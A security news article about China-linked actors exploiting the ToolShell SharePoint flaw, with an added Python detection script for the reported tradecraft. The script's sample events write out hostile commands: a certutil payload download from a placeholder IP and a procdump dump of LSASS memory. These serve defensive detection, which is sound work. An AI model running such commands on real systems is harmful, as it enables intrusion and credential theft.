China-linked hackers exploit patched ToolShell flaw to breach Middle East telecom
2025-10-24 08:37:53 Author: securityaffairs.com

China-based threat actors exploited ToolShell SharePoint flaw CVE-2025-53770 soon after its July patch.

China-linked threat actors exploited the ToolShell SharePoint vulnerability, tracked as CVE-2025-53770, to breach a telecommunications company in the Middle East shortly after Microsoft addressed the flaw in July 2025.

“China-based attackers used the ToolShell vulnerability (CVE-2025-53770) to compromise a telecoms company in the Middle East shortly after the vulnerability was publicly revealed and patched in July 2025.” reads the report published by Broadcom’s Symantec Threat Hunter Team.

According to Broadcom’s Symantec Threat Hunter Team, the attackers, linked to Glowworm (aka Earth Estries) and UNC5221, breached multiple targets, including two African government departments, two South American agencies, and a U.S. university. The hackers used tools like Zingdoor and KrustyLoader, and targeted SQL and Apache ColdFusion servers. A fake “mantec.exe” (masquerading as Symantec software) sideloaded malware. Additional victims include a state tech agency in Africa, a Middle Eastern ministry, and a European finance firm.

In July, Microsoft warned of a SharePoint zero-day vulnerability, tracked as CVE-2025-53770 (CVSS score of 9.8), that was under active exploitation. The vulnerability is a deserialization of untrusted data in on-premises Microsoft SharePoint Server; an unauthorized attacker could exploit it to execute code over a network.

Microsoft later confirmed that three China-based groups, Budworm, Violet Typhoon (aka Sheathminer), and Storm-2603, had exploited ToolShell, with the latter deploying Warlock ransomware.

Also targeted were government departments in an African country, government agencies in South America, and a university in the U.S., along with likely victims that include a state technology agency in an African country, a government department in the Middle East, and a finance company in a European country.

According to Broadcom’s Symantec Threat Hunter Team, the attacks involved the exploitation of CVE-2025-53770, a now-patched security flaw in on-premises SharePoint servers that could be used to bypass authentication and achieve remote code execution.

Malicious activity at a Middle Eastern telecom began on July 21, 2025, two days after ToolShell was patched, with attackers using a webshell and DLL sideloading to deploy backdoors and loaders. Zingdoor was sideloaded via a Trend Micro binary to collect data, transfer files and run commands. Threat actors sideloaded the ShadowPad backdoor using a BitDefender binary; it supports plug-in updates and has been used alongside ransomware. On July 25, attackers dropped the Rust-based KrustyLoader to fetch second-stage payloads, evade analysis and self-delete. Attackers also employed a variety of publicly available and living-off-the-land tools, including Certutil for file downloads, GoGo Scanner for network scanning, Revsocks for proxying traffic through firewalls, and Sysinternals’ Procdump, PowerSploit’s Minidump, and LsassDumper to extract LSASS process memory and steal credentials.
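The tradecraft listed above (a webshell spawning commands from the SharePoint worker process, Certutil used as a downloader, LSASS memory dumping, and vendor-lookalike binaries staged in user-writable directories for sideloading) maps directly onto process-creation telemetry that most EDR or Sysmon deployments already collect. The following is an added example written for this page, not code from Symantec or from the article; it runs a handful of heuristic rules over constructed process-creation events. The event fields, the sample command lines, the placeholder IP address and the list of vendor name fragments are all assumptions made for illustration and would need to be adapted to an organization's own telemetry schema and software inventory.

```python
"""Toy detection pass over constructed Windows process-creation events.

Heuristics follow the tradecraft named in the report: SharePoint's w3wp.exe
spawning a shell (webshell), certutil used as a downloader, LSASS memory
dumping with tools such as Procdump, and executables named like security
vendor software running from user-writable paths (sideloading staging).
All event values below are constructed; none are real indicators.
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass
class ProcEvent:
    # Hypothetical event schema, modelled loosely on Sysmon Event ID 1 fields.
    host: str
    parent_image: str
    image: str
    command_line: str


# Directories where a legitimately installed vendor binary would not normally run from.
USER_WRITABLE = ("\\temp\\", "\\programdata\\", "\\users\\public\\", "\\appdata\\")
# Illustrative name fragments only ("mantec" is the lookalike named in the report);
# a real deployment would derive this list from its own software inventory.
VENDOR_FRAGMENTS = ("mantec", "trend", "bitdefender")
# Tool names from the report that are known to read LSASS memory.
LSASS_DUMPERS = ("procdump", "lsassdumper")


def _base(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def sharepoint_spawned_shell(e: ProcEvent) -> bool:
    # The IIS worker process hosting SharePoint should not be launching shells.
    return _base(e.parent_image) == "w3wp.exe" and _base(e.image) in ("cmd.exe", "powershell.exe")


def certutil_download(e: ProcEvent) -> bool:
    # certutil switches commonly abused to fetch or decode payloads.
    return _base(e.image) == "certutil.exe" and re.search(r"-urlcache|-split|-decode", e.command_line, re.I) is not None


def lsass_memory_access(e: ProcEvent) -> bool:
    cmd = e.command_line.lower()
    name = _base(e.image)
    dumper = any(name.startswith(d) for d in LSASS_DUMPERS)
    # PowerSploit's Out-Minidump is invoked through PowerShell rather than its own binary.
    pwsh_minidump = name == "powershell.exe" and "out-minidump" in cmd
    return "lsass" in cmd and (dumper or pwsh_minidump)


def vendor_lookalike_in_writable_path(e: ProcEvent) -> bool:
    path = e.image.replace("/", "\\").lower()
    name = _base(e.image)
    return any(v in name for v in VENDOR_FRAGMENTS) and any(d in path for d in USER_WRITABLE)


RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    (f.__name__, f)
    for f in (sharepoint_spawned_shell, certutil_download, lsass_memory_access, vendor_lookalike_in_writable_path)
]


def evaluate(events: List[ProcEvent]) -> List[Tuple[str, str, str]]:
    """Return (host, rule name, image) for every rule that fires on every event."""
    return [(e.host, name, e.image) for e in events for name, rule in RULES if rule(e)]


def hits_by_host(events: List[ProcEvent]) -> Dict[str, int]:
    """Count alerts per host so a triage queue can surface the noisiest machine first."""
    counts: Dict[str, int] = {}
    for host, _, _ in evaluate(events):
        counts[host] = counts.get(host, 0) + 1
    return counts


# Constructed sample telemetry: four events in the shape of the reported activity, one benign.
SAMPLE_EVENTS = [
    ProcEvent("sp-web-01", r"C:\Windows\System32\inetsrv\w3wp.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcEvent("sp-web-01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
              "certutil -urlcache -split -f http://203.0.113.10/stage.bin C:\\ProgramData\\stage.bin"),
    ProcEvent("sp-web-01", r"C:\Windows\System32\cmd.exe", r"C:\ProgramData\mantec.exe", "mantec.exe"),
    ProcEvent("dc-01", r"C:\Windows\System32\cmd.exe", r"C:\Users\Public\procdump.exe",
              "procdump.exe -ma lsass.exe C:\\Users\\Public\\out.dmp"),
    ProcEvent("ws-42", r"C:\Windows\explorer.exe", r"C:\Windows\System32\certutil.exe", "certutil -hashfile setup.msi SHA256"),
]

if __name__ == "__main__":
    for host, rule, image in evaluate(SAMPLE_EVENTS):
        print(f"{host}: {rule} -> {image}")
    print(hits_by_host(SAMPLE_EVENTS))
```

The rules are deliberately narrow so that each maps to one behaviour the report describes; the benign `certutil -hashfile` event shows that the downloader rule keys on the abused switches rather than on the binary alone. In practice the vendor-fragment list is the weakest piece and should be replaced by a check of the image's Authenticode signer against its install path.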

“An exploit for the Windows LSA Spoofing Vulnerability, CVE-2021-36942 (aka PetitPotam), was also executed.” continues the post. “PetitPotam is an exploitation technique that allows for a threat actor within a compromised network to steal credentials and authentication information from Windows Servers such as a Domain Controller to gain full control of the domain. This is likely used for lateral movement or privilege escalation.”

The attacks reveal ToolShell was exploited by a broader range of China-based threat actors than initially known. While overlaps exist with Glowworm activity, attribution remains uncertain. The numerous victims suggest mass scanning for vulnerable servers, followed by targeted intrusions focused on credential theft and long-term, covert access, indicating a likely espionage-driven campaign.

“There is some overlap in the types of victims and some of the tools used between this activity and activity previously attributed to Glowworm. However, we do not have sufficient evidence to conclusively attribute this activity to one specific group, though we can say that all evidence points to those behind it being China-based threat actors.” concludes the report. “The large number of apparent victims of this activity is also notable. This may indicate that the attackers were carrying out an element of mass scanning for the ToolShell vulnerability, before then carrying out further activity only on networks of interest.”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, ToolShell)

Source: https://securityaffairs.com/183800/security/china-linked-hackers-exploit-patched-toolshell-flaw-to-breach-middle-east-telecom.html